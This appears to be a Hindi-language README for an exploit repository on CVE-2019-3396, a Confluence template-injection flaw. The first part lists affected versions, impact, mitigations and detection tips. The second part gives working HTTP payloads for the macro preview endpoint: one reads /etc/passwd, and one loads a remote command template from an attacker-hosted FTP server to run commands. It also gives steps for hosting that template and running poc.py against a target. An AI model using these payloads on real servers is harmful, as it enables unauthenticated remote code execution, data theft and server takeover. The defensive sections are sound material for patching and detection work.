CVE-2019-3396
CVE-2019-3396 confluence SSTI RCE
🔎 CVE-2019-3396 क्या है?
- एक गंभीर Confluence बग (Atlassian)।
- प्रकार: Template Injection + Path Traversal।
- जोखिम: Remote Code Execution (RCE) बिना लॉगिन के।
- स्थिति: जंगली में शोषित।
🛑 प्रभावित संस्करण
- 6.6.0 → 6.6.11 ❌ कमजोर
- 6.6.12 ✅ ठीक किया गया
- 6.12.0 → 6.12.2 ❌ कमजोर
- 6.12.3 ✅ ठीक किया गया
- 6.13.0 → 6.13.2 ❌ कमजोर
- 6.13.3 ✅ ठीक किया गया
- 6.14.0 → 6.14.1 ❌ कमजोर
- 6.14.2 ✅ ठीक किया गया
👉 पूर्ण विवरण के लिए हमेशा Atlassian की आधिकारिक सलाह जांचें।
💥 प्रभाव
- पूर्ण सर्वर अधिग्रहण
- डेटा चोरी, ransomware, crypto-miners
- हमलावर कोई भी कोड चला सकते हैं जो वे चाहते हैं
🔐 शमन
- ✅ अपग्रेड करें पैच किए गए Confluence संस्करण में (सबसे अच्छा समाधान)
- 🚫 यदि आप तुरंत पैच नहीं कर सकते तो Widget Connector मैक्रो को अक्षम करें
- 🔒 पहुंच सीमित करें (ठीक होने तक केवल आंतरिक)
👀 पहचान (सुरक्षित सुझाव)
- मैक्रो/प्रीव्यू एंडपॉइंट्स पर अजीब अनुरोधों के लिए लॉग देखें
- असामान्य प्रक्रियाओं या बाहरी ट्रैफ़िक की तलाश करें
- संस्करण की पुष्टि करने के लिए भेद्यता स्कैनर का उपयोग करें
📂 फ़ाइल पढ़ें
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}
{"macro":{"params":{"_template":"file:///etc/passwd"}}}
कमांड निष्पादित करें
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***
{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}
स्वचालन
- अपने VPS पर cmd.vm अपलोड करें
- इस cmd.vm फ़ाइल का लिंक बनाने के लिए ftp या https का उपयोग करें
pip install pyftpdlib
python -m pyftpdlib -p 8888
- poc.py फ़ाइल को pyftp = "ftp://10.100.10.100:8888/cmd.vm" के नए मान से अपडेट करें
python poc.py <url> <cmd>
python poc.py https://ip:port "id"
⚠️ सुझाव — यह रेपो केवल शिक्षा, रक्षा और जागरूकता के लिए है।
🔗 संदर्भ